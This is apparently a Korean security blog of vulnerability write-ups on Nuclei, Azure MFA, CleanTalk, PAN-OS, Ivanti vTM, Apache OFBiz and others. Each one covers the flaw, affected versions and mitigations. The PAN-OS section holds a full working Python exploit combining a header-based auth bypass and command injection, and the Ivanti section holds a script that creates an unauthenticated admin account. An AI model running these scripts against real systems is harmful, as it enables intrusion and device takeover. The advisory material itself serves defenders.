꼰머의 보안공부

1. Nuclei [2][3][4]

- ProjectDiscovery에서 개발한 YAML 기반 템플릿을 사용하여 취약점을 스캔하는 go 언어 기반의 오픈소스 취약점 스캐너
> YAML 파일로 취약점 스캔 탬플릿을 정의하며, 해당 템플릿을 통해 취약점을 식별
> 템플릿은 직접 작성하거나 커뮤니티에서 제공하는 템플릿 활용 가능
- 웹 애플리케이션 취약점, 네트워크 서비스, API 스캔 등이 가능
- 멀티스레드 기반의 빠른 스캔, 유연성 및 확장성 등의 장점이 있음

2. CVE-2024-43405

- Nuclear의 템플릿 서명 검증 시스템에서 발생하는 서명 검증 우회 취약점

영향받는 버전 : Nuclei 3.0.0 ~ 3.3.2 이전 버전

- ProjectDiscovery는 무단 데이터 액세스와 시스템 손상을 방지 하기위해 서명 검증 메커니즘을 구현 (위변조 방지, 무결성 확인)

> 템플릿 파일 내용을 기준으로 SHA256을 계산해 "#digest:"로 삽입

- Nuclear 서명 검증 논리에서 서명 추출 및 제거는 정규표현식을 사용하며, 이후 구문 분석 및 실행에는 YAML 파서 사용

> Line1 ~ Line31 : 첫 번째 서명을 찾아 템플릿에서 서명을 제거
> Line33 ~ Line51 : 서명 검증 후 YAML로 구문 분석 및 실행

> 첫 번째 서명(#digest:)만 확인 : 악성코드가 포함된 두 번째 서명이 검증되지 않고 템플릿에 남아있을 수 있음
> 줄 바꿈 해석 불일치 : 정규 표현식을 사용한 서명 검증과 YAML 파서 간 줄 바꿈 해석 불일치로 추가 콘텐츠를 삽입할 수 있음

1     var (
2       ReDigest         = regexp.MustCompile(`(?m)^#\sdigest:\s.+$`)
3       SignaturePattern = "# digest: "
4     )
5     
6     func RemoveSignatureFromData(data []byte) []byte {
7       return bytes.Trim(ReDigest.ReplaceAll(data, []byte("")), "\n")
8     }
9     
10     func (t *TemplateSigner) Verify(data []byte) (bool, error) {
11       digestData := ReDigest.Find(data)
12       if len(digestData) == 0 {
13         return false, errors.New("digest not found")
14       }
15     
16       digestData = bytes.TrimSpace(bytes.TrimPrefix(digestData, []byte(SignaturePattern)))
17       digestString := strings.TrimSuffix(string(digestData), ":"+t.GetUserFragment())
18       digest, err := hex.DecodeString(digestString)
19       if err != nil {
20         return false, err
21       }
22     
23       buff := bytes.NewBuffer(RemoveSignatureFromData(data))
24     
25       // Verify using standard Go's ECDSA
26       if !t.verify(sha256.Sum256(buff.Bytes()), digest) {
27         return false, errors.New("signature verification failed")
28       }
29     
30       return true, nil
31     }
32     
33     // SecureExecute is a mock we at Wiz created that mimics Nuclei's logic to illustrate the vulnerability, 
34     // verifying a template's signature, parsing it as YAML, and executing it.
35     func SecureExecute(rawTemplate []byte, verifier *TemplateSigner) (interface{}, error) {
36       // Verify the template signature
37       isVerified, err := verifier.Verify(rawTemplate)
38       if err != nil || !isVerified {
39         return nil, errors.New("template verification failed")
40       }
41     
42       // Parse the template
43       template := &Template{}
44       err = yaml.Unmarshal(rawTemplate, template)
45       if err != nil {
46         return nil, errors.New("couldn't unmarshal template")
47       }
48     
49       // Execute the template and return the result
50       return template.execute()
51     }

- 두 번째 서명에 '\r'를 포함한 악성코드를 삽입하여 악용 가능
> 두 번째 서명은 서명 검증 과정을 거치지 않고, YAML에서 구문 분석 후 실행됨

3. 대응방안

- Nuclei 3.3.2 이상으로 업그레이드
- 악성 템플릿의 실행을 방지하기 위해 샌드박스 또는 격리된 환경에서 Nuclei 실행

4. 참고

[1] https://www.wiz.io/blog/nuclei-signature-verification-bypass
[2] https://github.com/projectdiscovery/nuclei
[3] https://github.com/projectdiscovery/nuclei/blob/dev/README_KR.md
[4] https://bugbounty.tistory.com/55
[5] https://nvd.nist.gov/vuln/detail/CVE-2024-43405
[6] https://www.bleepingcomputer.com/news/security/nuclei-flaw-lets-malicious-templates-bypass-signature-verification/
[7] https://thehackernews.com/2025/01/researchers-uncover-nuclei.html
[8] https://www.dailysecu.com/news/articleView.html?idxno=162701

1. 개요

- MS 다중인증 환경에서 인증앱을 활용한 다중인증의 경우, 인증 우회 취약점 발견 [1]
- Outlook, OneDrive, Teams, Azure Cloud 등 각종 MS 계정에 무단 접근이 가능
- MS에 가입된 유로 계정은 약 4억 개로 공격 성공 시 매우 큰 파장을 일으킬 수 있음

2. 주요내용

- 사용자가 MS 포털에 접속 시 계정과 6자리 코드를 사용해 로그인 시도
> 사용자가 로그인 페이지에 처음 접속하면 세션 식별자 할당
> 계정 정보 입력 후 추가 인증을 요구하며, 6자리 코드를 제공해 인증 과정 마무리

- 한 세션에서 10번 연속 입력을 실패할 경우 계정 잠금
> 연구진은 새 세션을 빠르게 생성한 후 6자리 코드를 대입하는 실험을 진행
> 실험 결과 여러 시도를 어떠한 경고(≒알림) 없이 동시에 실행할 수 있음을 발견

- 인증 앱을 사용한 인증 방법에는 시간 제한이 존재
> 30초 간격으로 새로운 코드가 생성 되도록 하는 것이 일반적
> 그러나, MS 로그인을 테스트한 결과 코드가 약 3분동안 유효한 것으로 확인
> 이는 공격에 성공할 확률이 3% 증가하는 수치*

* 공격자의 입장에서 세션을 24개 생성해 연속적으로 공격을 수행할 경우 70분의 시간을 확보하는 것
* 70분이 지나면 유효한 코드를 입력할 확률이 이미 50%를 넘어감

- 연구원들은 결과를 MS에 제보
> MS는 취약점을 수정한 버전 배포

3. 참고

[1] https://www.oasis.security/resources/blog/oasis-security-research-team-discovers-microsoft-azure-mfa-bypass
[2] https://www.youtube.com/watch?v=E0Kt6LUZc0w
[3] https://www.boannews.com/media/view.asp?idx=135110

1. CleanTalk 플러그인 [1]

- 워드프레스 웹사이트에서 스팸을 방지하기 위해 사용되는 플러그인
- 스팸 방지 기능을 제공하는 클라우드 기반 서비스

2. 주요내용 [2]

2.1 CVE-2024-10542

- WordPress CleanTalk 플러그인에서 발생하는 DNS 스푸핑을 통한 인증 우회 취약점 (CVSS: 9.8)
> 악용에 성공할 경우 인증되지 않은 공격자가 임의의 플러그인을 설치 및 활성화하여 원격 코드를 실행할 수 있음

영향받는 버전
- Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.43.2

- 아래 함수는 토큰을 저장된 API 비교 또는 checkWithoutToken()를 통해 토큰 없이도 작업을 수행할 수 있는지 확인

78 |  // Check Access key
79 | if (
80 |     ($token === strtolower(md5($apbct->api_key)) ||
81 |      $token === strtolower(hash('sha256', $apbct->api_key))) ||
82 |    self::checkWithoutToken()
83 | ) {
84 |     // Flag to let plugin know that Remote Call is running.
85 |     $apbct->rc_running = true;
86 |  
87 |   $action = 'action__' . $action;
88 | 
89 |   if ( method_exists(__CLASS__, $action) ) {

- checkWithoutToken()는 발신 IP가 cleantalk.org 에 속하는지 확인
> IP는 사용자 정의 매개 변수인 X-Central-Ip 및 X-Forward-By 헤더 매개 변수로 결정되므로, IP 스푸핑에 취약
> IP 확인 후 strpos()를 사용해 도메인 이름을 확인하는데, 도메인에 'cleantalk.org' 문자열이 포함된 경우 검사를 통과할 수 있어, DNS 스푸핑에 취약

34 | public static function checkWithoutToken()
35 | {
36 |    global $apbct;
37 | 
38 |    $is_noc_request = ! $apbct->key_is_ok &&
39 |        Request::get('spbc_remote_call_action') &&
40 |        in_array(Request::get('plugin_name'), array('antispam', 'anti-spam', 'apbct')) &&
41 |        strpos(Helper::ipResolve(Helper::ipGet()), 'cleantalk.org') !== false;

2.2 CVE-2024-10781

- WordPress CleanTalk 플러그인에서 ‘api_key’ 값 검증 누락으로 인해 발생하는 인증 우회 취약점 (CVSS: 8.1)
> 악용에 성공할 경우 인증되지 않은 공격자가 임의의 플러그인을 설치 및 활성화할 수 있음

영향받는 버전
- Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.44

- API 키와 해시를 비교하여 토큰을 인증하는 방법이 존재
> 그러나 해당 함수에 API 키가 비어 있을 때 인증을 방지하기 위한 검증이 없음
> API 키가 플러그인에 구성되어 있지 않으면 비어 있는 해시 값과 일치하는 토큰을 사용해 인증을 우회할 수 있음

76 | $token  = strtolower(Request::get('spbc_remote_call_token'));
...
93 | // Check Access key
94 | if (
95 |    ($token === strtolower(md5($apbct->api_key)) ||
96 |     $token === strtolower(hash('sha256', $apbct->api_key))) ||
97 |    (self::checkWithoutToken() && self::isAllowedWithoutToken($action))
98 | ) {

3. 대응방안

- 벤더사 제공 업데이트 적용 [5][6]

> 두 취약점이 모두 해결된 6.45 버전으로 업데이트 권고

4. 참고

[1] https://cleantalk.org/
[2] https://www.wordfence.com/blog/2024/11/200000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-anti-spam-by-cleantalk-wordpress-plugin/
[3] https://nvd.nist.gov/vuln/detail/CVE-2024-10542
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-10781
[5] https://wordpress.org/plugins/cleantalk-spam-protect/#developers
[6] https://asec.ahnlab.com/ko/84781/
[7] https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html
[8] https://www.securityweek.com/critical-vulnerabilities-found-in-anti-spam-plugin-used-by-200000-wordpress-sites/
[9] https://www.boannews.com/media/view.asp?idx=134689&page=2&kind=1

1. NVIDIA Base Command Manager (NVIDIA BCM) [1]

- AI(인공지능)와 HPC(High Performance Computing, 고성능 컴퓨팅)을 위한 클러스터 관리 소프트웨어
- 멀티 클라우드 및 온프레미스 환경 지원

※ 클러스터(Cluster) : 여러 대의 컴퓨터가 서로 연결되어 하나의 시스템처럼 작동하도록 구성한 컴퓨팅 환경

2. CVE-2024-0138

- NVIDIA BCM 구성요소인 CMDaemon의 인증 누락 취약점 (CVSS : 9.8)
> CMDaemon : CPU나 네트워크 등 클러스터의 구성요소 간 통신을 지원하고, 작업이 원활하게 실행되도록 돕는 프로세스 [3]
> 익스플로잇에 성공할 경우 코드 실행, 서비스 거부, 권한 상승, 정보 유출, 데이터 변조가 가능

영향받는버전
NVIDIA Base Command Manager 10.24.09

- 누구나 인증 없이 시스템에 접근할 수 있는 취약점으로 신속한 업데이트 권고 [4][5]

3. 참고

[1] https://docs.nvidia.com/base-command-manager/index.html
[2] https://nvd.nist.gov/vuln/detail/CVE-2024-0138
[3] https://docs.nvidia.com/dgx-superpod/administration-guide-dgx-superpod/latest/cluster-management-daemon.html#cluster-management-daemon
[4] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&pageIndex=1&nttId=71594&menuNo=205020
[5] https://nvidia.custhelp.com/app/answers/detail/a_id/5595
[6] https://github.com/advisories/GHSA-626w-372f-948x
[7] https://www.boannews.com/media/view.asp?idx=134648&page=1&kind=1

1. PAN-OS

- Palo Alto Networks 사에서 판매하는 장비들에 탑재되어 있는 운영체제

2. 주요내용 [1]

2.1 CVE-2024-0012 [2]

- Palo Alto Networks PAN-OS에 존재하는 인증 우회 취약점 (CVSS : 9.3)

> 공격자가 인증이나 사용자 상호작용 없이 관리자 권한을 얻을 수 있으며, 방화벽 설정에 무단 접근 및 제어가 가능
> CVE-2024-9474와 연계하여 공격이 진행 중

영향받는 버전
- PAN-OS 11.2.4-h1 버전 미만
- PAN-OS 11.1.5-h1 버전 미만
- PAN-OS 11.0.6-h1 버전 미만
- PAN-OS 10.2.12-h2 버전 미만

- 취약점은 uiEnvSetup.php 스크립트에서 발생

> 스크립트는 HTTP 헤더 HTTP_X_PAN_AUTHCHECK가 "on" 또는 "off"인지 확인
> "on"으로 설정된 경우 스크립트는 사용자를 로그인 페이지로 리다이렉션
> 헤더가 기본 구성(/etc/nginx/conf/proxy_default.conf 파일)에서 "on"으로 설정되어 있으나, 이를 "off"로 변경하여 인증을 우회할 수 있음

if (
    $_SERVER['HTTP_X_PAN_AUTHCHECK'] != 'off'
    && $_SERVER['PHP_SELF'] !== '/CA/ocsp'
    &&  $_SERVER['PHP_SELF'] !== '/php/login.php'
    && stristr($_SERVER['REMOTE_HOST'], '127.0.0.1') === false
) {
    $_SERVER['PAN_SESSION_READONLY'] = true;
    $ws = WebSession::getInstance($ioc);
    $ws->start();
    $ws->close();
    // these are horrible hacks.
    // This whole code should be removed and only make available to a few pages: main, debug, etc.
    if (
        !Str::startsWith($_SERVER['PHP_SELF'], '/php-packages/panorama_webui/php/api/index.php')
        && !Str::startsWith($_SERVER['PHP_SELF'], '/php-packages/firewall_webui/php/api/index.php')
    ) {
        if (Backend::quickSessionExpiredCheck()) {
            if (isset($_SERVER['QUERY_STRING'])) {
                Util::login($_SERVER['QUERY_STRING']);
            } else {
                Util::login();
            }
            exit(1);
        }
    }
}

2.2 CVE-2024-9474 [3]

- Palo Alto Networks PAN-OS에 존재하는 권한 상승 취약점

영향받는 버전
- PAN-OS 11.2.4-h1 버전 미만
- PAN-OS 11.1.5-h1 버전 미만
- PAN-OS 11.0.6-h1 버전 미만
- PAN-OS 10.2.12-h2 버전 미만
- PAN-OS 10.1.14-h6 버전 미만

- 취약점은 createRemoteAppwebSession.php 스크립트에서 발생

> 해당 스크립트를 사용하면 공격자는 임의의 사용자를 만들고, PHPSESSID(인증 토큰)를 할당받을 수 있음
> 할당받은 인증 토큰을 이용해 악성 명령 실행 가능

2.3 PoC [4]

- X-PAN-AUTHCHECK 헤더를 off로 설정하여 인증 우회

- createRemoteAppwebSession.php를 이용해 PHPSESSID 획득

#POC is written by Chirag Artani
import requests
import argparse
from urllib.parse import urljoin
import logging
import urllib3
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def setup_logging():
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(levelname)s - %(message)s'
    )

class VulnChecker:
    def __init__(self, base_url, verify_ssl=False, timeout=30):
        self.base_url = base_url
        self.verify_ssl = verify_ssl
        self.timeout = timeout
        self.session = requests.Session()
        
        if not verify_ssl:
            urllib3.disable_warnings(InsecureRequestWarning)
            self.session.verify = False
    
    def make_request(self, method, endpoint, **kwargs):
        try:
            url = urljoin(self.base_url, endpoint)
            kwargs['timeout'] = self.timeout
            kwargs['verify'] = self.verify_ssl
            
            response = self.session.request(method, url, **kwargs)
            response.raise_for_status()
            return response
            
        except requests.exceptions.SSLError as e:
            logging.error(f"SSL Error: {str(e)}")
            logging.info("Try using --no-verify if the target uses self-signed certificates")
            return None
        except requests.exceptions.RequestException as e:
            logging.error(f"Request failed: {str(e)}")
            return None

    def create_initial_session(self):
        """Create initial session with command injection payload"""
        headers = {
            'X-PAN-AUTHCHECK': 'off',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        
        # Command injection payload to write system info to file
        data = {
            'user': '`echo $(uname -a) > /var/appweb/htdocs/unauth/watchTowr.php`',
            'userRole': 'superuser',
            'remoteHost': '',
            'vsys': 'vsys1'
        }
        
        response = self.make_request(
            'POST',
            '/php/utils/createRemoteAppwebSession.php/watchTowr.js.map',
            headers=headers,
            data=data
        )
        
        if response and 'PHPSESSID' in response.cookies:
            phpsessid = response.cookies['PHPSESSID']
            logging.info(f"Initial session created: {phpsessid}")
            return phpsessid
        return None

    def trigger_execution(self, phpsessid):
        """Trigger command execution via index page"""
        headers = {
            'Cookie': f'PHPSESSID={phpsessid}',
            'X-PAN-AUTHCHECK': 'off',
            'Connection': 'keep-alive'
        }
        
        response = self.make_request(
            'GET',
            '/index.php/.js.map',
            headers=headers
        )
        
        if response:
            logging.info(f"Trigger response status: {response.status_code}")
            if response.text:
                logging.info(f"Response content length: {len(response.text)}")
            return True
        return False

    def verify_execution(self):
        """Verify command execution by checking created file"""
        response = self.make_request(
            'GET',
            '/unauth/watchTowr.php'
        )
        
        if response and response.status_code == 200:
            logging.info("Command execution verified")
            if response.text:
                logging.info(f"System info: {response.text.strip()}")
            return True
        return False

def main():
    parser = argparse.ArgumentParser(description='Vulnerability Check Script')
    parser.add_argument('--url', required=True, help='Target base URL (http:// or https://)')
    parser.add_argument('--no-verify', action='store_true', help='Disable SSL verification')
    parser.add_argument('--timeout', type=int, default=30, help='Request timeout in seconds')
    args = parser.parse_args()
    
    setup_logging()
    logging.info(f"Starting vulnerability check against {args.url}")
    
    checker = VulnChecker(
        args.url,
        verify_ssl=not args.no_verify,
        timeout=args.timeout
    )
    
    # Step 1: Create session with command injection payload
    phpsessid = checker.create_initial_session()
    if not phpsessid:
        logging.error("Session creation failed")
        return
    
    # Step 2: Trigger command execution
    if checker.trigger_execution(phpsessid):
        logging.info("Command execution triggered successfully")
        
        # Step 3: Verify the result
        if checker.verify_execution():
            logging.info("Verification completed successfully")
        else:
            logging.error("Verification failed - file not created or accessible")
    else:
        logging.error("Command execution trigger failed")

if __name__ == "__main__":
    main()

3. 대응방안

- 벤더사 제공 최신 업데이트 적용 [5][6]

- 권고 사항

① 접근 제한 : 관리 인터페이스에 대한 접근을 신뢰할 수 있는 내부 네트워크로 제한 및 다중 인증(MFA)을 구현

> 특정 IP 주소로만 접속이 가능하게 하면 CVSS 9.3에서 7.5로 감소

② 시스템 모니터링: 의심스러운 활동을 실시간으로 감지하고 대응하기 위한 지속적인 모니터링

③ 관리자 교육: 시스템 관리자들이 최신 보안 권고 사항을 숙지하고, 신속한 업데이트의 중요성을 이해하도록 교육

4. 참고

[1] https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
[2] https://nvd.nist.gov/vuln/detail/CVE-2024-0012
[3] https://nvd.nist.gov/vuln/detail/CVE-2024-9474
[4] https://github.com/Sachinart/CVE-2024-0012-POC
[5] https://security.paloaltonetworks.com/CVE-2024-0012
[6] https://security.paloaltonetworks.com/CVE-2024-9474
[7] https://www.picussecurity.com/resource/blog/palo-alto-cve-2024-0012-and-cve-2024-9474-vulnerabilities-explained
[8] https://www.boannews.com/media/view.asp?idx=134400&page=9&kind=1
[9] https://www.boannews.com/media/view.asp?idx=134571&page=1&kind=1
[10] https://www.dailysecu.com/news/articleView.html?idxno=161318
[11] https://www.dailysecu.com/news/articleView.html?idxno=161409

1. SonicOS

- SonicWall이 개발한 네트워크 보안 운영 체제
- 주로 방화벽 및 보안 장비에 사용

2. CVE-2024-40766

- SonicWall SonicOS 관리 액세스의 부적절한 액세스 제어 취약성 (CVSS: 9.3)
> 네트워크 자원에 무단 접근을 허용하거나 방화벽을 충돌시켜 네트워크 보호 기능을 무력화할 수 있음
> 취약점이 처음 공개된 당시 SonicOS 관리 액세스 기능에만 영향을 미치는 것으로 알려졌으나, SSLVPN 기능에도 영향을 미치는 것으로 확인됨
> 취약점과 관련된 구체적인 정보를 공개하지 않았으나, 현재 악용되는 중으로, Akira 랜섬웨어 조직이 취약점을 악용하는 중 [2]

- 벤더사 제공 최신 업데이트 적용 [3][4]

> 추가적으로 방화벽 관리 액세스 제한, SSLVPN 비밀번호 재설정, MFA 적용, SSLVPN 액세스 제어 또는 비활성화 등 조치 권고

3. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-40766
[2] https://arcticwolf.com/resources/blog/arctic-wolf-observes-akira-ransomware-campaign-targeting-sonicwall-sslvpn-accounts/
[3] https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015
[4] https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&bbsId=B0000133&searchWrd=&menuNo=205020&pageIndex=1&categoryCode=&nttId=71546
[5] https://thehackernews.com/2024/09/sonicwall-urges-users-to-patch-critical.html
[6] https://www.securityweek.com/sonicwall-patches-critical-sonicos-vulnerability/
[7] https://www.securityweek.com/recent-sonicwall-firewall-vulnerability-potentially-exploited-in-the-wild/
[8] https://www.dailysecu.com/news/articleView.html?idxno=159256

1. Ivanti Virtual Traffic Manager (vTM) [1]

- 소프트웨어 기반의 Application Delivery Controller(ADC)
- 로드밸런싱과 애플리케이션 딜리버리 기능을 제공

※ Application Delivery Controller(ADC) [2][3]
> 데이터 센터의 웹 서버 앞에 위치하여 여러 사용자에게 애플리케이션을 안정적이고 효율적으로 제공하기 위한 역할을 수행하는 네트워크 장치

2. 취약점

2.1 CVE-2024-7593 [4]

- 취약한 Ivanti vTM의 인증 알고리즘 구현 오류에서 비롯되는 인증 우회 취약점 (CVSS:9.8)

> 악용 사례는 없으나 PoC 코드가 공개된 만큼 빠른 조치가 필요

영향받는 버전
vTM ~ 22.2 이하 버전
vTM ~ 22.3 이하 버전
vTM ~ 22.3R2 이하 버전
vTM ~ 22.5R1 이하 버전
vTM ~ 22.6R1 이하 버전
vTM ~ 22.7R1 이하 버전

2.2 PoC [5]

- params 설정
> wizard.fcgi의 access control를 우회하기 위해 error 파라미터를 1로 설정
> 계정 생성을 위한 섹션을 로드하기 위해 section 파라미터 설정

※ wizard.fcgi는 웹 인터페이스의 모든 섹션을 로드할 수 있음

- data 설정

> CSRF를 우회하기 위해 _form_submitted 필드를 form으로 설정
> 계정 생성을 의미하는 create_user 필드를 Create로 설정
> 관리자 계정 생성을 위한 추가 정보를 설정해 POST 요청 전송

- 응답 확인

> 응답 코드가 200이고 응답에 '<title>2<'이 포함된 경우 계정 생성이 정상적으로 수행된 것
> 생성한 계정을 통해 로그인 가능

# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass
# Date: 2024-08-03
# Exploit Author: ohnoisploited
# Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller
# Software Link: https://hubgw.docker.com/r/pulsesecure/vtm
# Version: 9.9
# Tested on: Linux
# Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC 
# Fixed versions: 22.7R2+

import requests

# Set to target address
admin_portal = 'https://192.168.88.130:9090'

# User to create
new_admin_name = 'newadmin'
new_admin_password = 'newadmin1234'

requests.packages.urllib3.disable_warnings() 
session = requests.Session()

# Setting 'error' bypasses access control for wizard.fcgi.
# wizard.fcgi can load any section in the web interface.
params = { 'error': 1,
          'section': 'Access Management:LocalUsers' }

# Create new user request
# _form_submitted to bypass CSRF
data = {  '_form_submitted': 'form',
          'create_user': 'Create',
          'group': 'admin',
          'newusername': new_admin_name,
          'password1': new_admin_password,
          'password2': new_admin_password }

# Post request
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)

# View response
content = r.content.decode('utf-8')
print(content)

if r.status_code == 200 and '<title>2<' in content:
    print("New user request sent")
    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
else:
    print("Unable to create new user")

3. 대응방안

- 벤더사 제공 업데이트 적용 [6][7]

- 즉각 업데이트 적용이 불가한 경우 [7]

> System > Security > Management IP Address and Admin Server Port > bindip 설정
> 또는, Restricting Access 설정을 이용해 Trusted IP의 접근만 허용하도록 할 수 있음

- "/apps/zxtm/wizard.fcgi", "error=" 탐지 정책 설정

4. 참고

[1] https://www.ivanti.com/resources/v/doc/ivi/2528/2ef03e8ed03d
[2] https://terms.tta.or.kr/dictionary/dictionaryView.do?word_seq=036033-1
[3] https://ithub.tistory.com/103
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-7593
[5] https://packetstormsecurity.com/files/179906/Ivanti-ADC-9.9-Authentication-Bypass.html
[6] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&pageIndex=1&nttId=71526&menuNo=205020
[7] https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US
[8] https://hackyboiz.github.io/2024/08/17/j0ker/2024-08-17/
[9] https://www.dailysecu.com/news/articleView.html?idxno=158549

1. CVE-2024-38856 [1]

- Apache OFBiz의 잘못된 인증으로 인해 인증을 거치지 않고 원격 코드 실행이 가능한 취약점

> 공격자들의 익스플로잇을 위한 스캔이 활발히 이루어지는 중

영향받는 버전: Apache OFBiz 18.12.14 이하 버전

2. 주요내용 [2]

- 취약점 악용에 사용되는 URL은 다음과 같음

> POST /webtools/control/forgotPassword/ProgramExport

> POST /webtools/control/main/ProgramExport

> POST /webtools/control/showDateTime/ProgramExport

> POST /webtools/control/view/ProgramExport

> POST /webtools/control/TestService/ProgramExport

- 사용자 요청 수신시 서버는 path , requestUri 및 overrideViewURI 변수의 값을 초기화 진행

> getRequestUri()를 호출하여 requestUri 초기화

> getOverrideViewUri()를 호출하여 overrideViewUri 초기화

* /forgotPassword/ProgramExport URL을 대상으로 분석

- getRequestUri()는 경로를 “/”로 분할한 후 0번째 요소의 값 반환

> URL /forgotPassword/ProgramExport에서 0번째 요소 값은 forgotPassword(반환 값)

- getOverrideViewUri() 또한 경로를 “/”로 분할한 후 1번째 요소 값 반환

> URL /forgotPassword/ProgramExport에서 1번째 요소 값은 ProgramExport(반환 값)

- requestUri 및 overrideViewURI 변수는 다음과 같이 초기화됨

> requestUri 변수 = forgotPassword

> overrideViewUri 변수 = ProgramExport

- 인증 검사는 requestUri 값에 대해 수행

> 앞선 초기화 결과 값의 차이로 인해 버그가 발생하여 잘못된 요청이 허용될 수 있는 것으로 판단됨

> 잘못된 요청의 경우 securityAuth 값이 false가 되어 인증을 필요로 하지 않음

- 마지막으로, ProgramExport 뷰를 렌더링하여 인증 없이 제공된 코드를 실행할 수 있음

- 익스플로잇 예시 및 시연 영상 [3]

3. 대응방안

- 벤더사 제공 업데이트 적용 [4]

> 권한 검사 기능을 도입: security.hasPermission() 추가 [5]

4. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-38856
[2] https://blog.sonicwall.com/en-us/2024/08/sonicwall-discovers-second-critical-apache-ofbiz-zero-day-vulnerability/#top
[3] https://d3ik27cqx8s5ub.cloudfront.net/blog/media/uploads/poc.mp4?_=1
[4] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&pageIndex=1&nttId=71517&menuNo=205020
[5] https://github.com/apache/ofbiz-framework/commit/9b20a93c2487cca47392e6489472495ab4719447
[6] https://securityaffairs.com/166612/hacking/critical-apache-ofbiz-flaw.html
[7] https://www.boannews.com/media/view.asp?idx=131858&page=1&kind=1